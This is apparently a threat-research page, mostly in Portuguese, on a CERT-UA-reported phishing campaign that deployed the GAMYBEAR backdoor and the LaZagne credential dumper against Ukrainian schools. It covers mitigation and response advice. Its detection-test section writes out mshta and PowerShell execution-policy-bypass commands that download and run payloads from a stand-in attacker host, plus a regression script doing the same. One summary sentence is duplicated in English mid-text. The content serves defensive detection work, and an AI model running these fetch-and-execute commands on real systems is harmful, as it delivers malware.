SOC Prime Bias: Crítico

20 Nov 2025 13:35 UTC

Ciberataque direcionado a uma escola do leste da Ucrânia usando a ferramenta GAMYBEAR (CERT-UA#18329)

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Ciberataque direcionado a uma escola do leste da Ucrânia usando a ferramenta GAMYBEAR (CERT-UA#18329)
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma campanha de coleta de credenciais atingiu escolas e agências públicas na região de Sumy via um e-mail de phishing contendo um anexo ZIP. A abertura do arquivo acionou um arquivo HTA através da utilidade mshta, que então puxou scripts PowerShell para implantar o backdoor GAMYBEAR e o despejador de credenciais LaZagne, estabelecer C2 baseado em HTTP e exfiltrar arquivos de diretórios alvo. utility, which then pulled down PowerShell scripts to deploy the GAMYBEAR backdoor and the LaZagne credential dumper, establish HTTP-based C2, and exfiltrate files from targeted directories.

Análise de Ataque

O CERT-UA vinculou a violação inicial a uma mensagem de phishing enviada em 26 de maio de 2025, a partir de uma conta Gmail sequestrada, fornecendo os detalhes da campanha no alerta CERT-UA#18329. A análise forense expôs uma cadeia de infecção em múltiplas etapas: ZIP → HTA → update.js → PowerShell → GAMYBEAR acompanhado pelo malware LaZagne, com persistência mantida por meio de uma entrada de registro Run e downloads recorrentes de URLs maliciosas.

Mitigação

Imponha a autenticação multifatorial para todas as contas de e-mail, bloqueie a execução de scripts HTA e PowerShell não confiáveis, bloqueie a chave de execução do registro e implemente a lista de permissões de aplicativos. Atualize continuamente as regras de detecção de endpoint para reconhecer os nomes de arquivos, hashes e indicadores de rede referenciados.

Resposta

Isole prontamente os endpoints impactados, redefina as credenciais do Gmail comprometidas, reúna todos os IOCs identificados e execute varreduras abrangentes para GAMYBEAR, LaZagne e artefatos associados. Informe o CERT-UA sobre o incidente e distribua os IOCs por meio de canais relevantes de compartilhamento de inteligência sobre ameaças.

Fluxo de Ataque

Simulações

Execução de Simulação

Pré-requisito: O Telemetry & Baseline Pre-flight Check deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa do Ataque e Comandos:

    1. Etapa 1 – Implantar HTA malicioso: O atacante hospeda evil.hta em um servidor web comprometido.

    2. Etapa 2 – Executar via mshta.exe: Usando um prompt de comando do Windows, o atacante executa mshta.exe http://attacker.com/evil.hta. Isso cria um evento de criação de processo com mshta.exe na linha de comando, satisfazendo a primeira cláusula da regra.

    3. Etapa 3 – Bypass do PowerShell: Para executar um payload que contorna a Política de Execução do sistema, o atacante lança PowerShell com o -ep bypass flag:

      PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"

      Isso gera um segundo evento de criação de processo contendo a string exata PowerShell -ep bypass, satisfazendo a segunda cláusula.

  • Script de Teste de Regressão: O seguinte script PowerShell reproduz as etapas acima de forma automatizada e repetível.

    # -------------------------------------------------
    # Teste de Regressão – Desencadear Regra Sigma para mshta & PowerShell -ep bypass
    # -------------------------------------------------
    
    # Variáveis – ajuste para o seu ambiente de laboratório
    $htaUrl   = "http://127.0.0.1/evil.hta"   # Deve apontar para um arquivo HTA acessível
    $psUrl    = "http://127.0.0.1/payload.ps1" # Payload PS simples (por exemplo, `Write-Host "pwned"`)
    
    # 1. Invocar mshta.exe
    Write-Host "[*] Lançando mshta.exe contra $htaUrl"
    Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow
    
    # Pausa curta para garantir os logs do processo
    Start-Sleep -Seconds 2
    
    # 2. Invocar PowerShell com bypass de política de execução
    $psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"
    Write-Host "[*] Lançando PowerShell -ep bypass"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow
    
    # Pausa para permitir a geração de logs
    Start-Sleep -Seconds 5
    
    Write-Host "[+] Teste concluído. Verifique seu SIEM por alertas."
  • Comandos de Limpeza: Remova arquivos temporários e termine quaisquer processos de teste restantes.

    # Limpeza de payload temporário
    Remove-Item -Path "$env:TEMPp.ps1" -ErrorAction SilentlyContinue
    
    # Opcionalmente, mate instâncias de mshta ou PowerShell criadas pelo teste
    Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force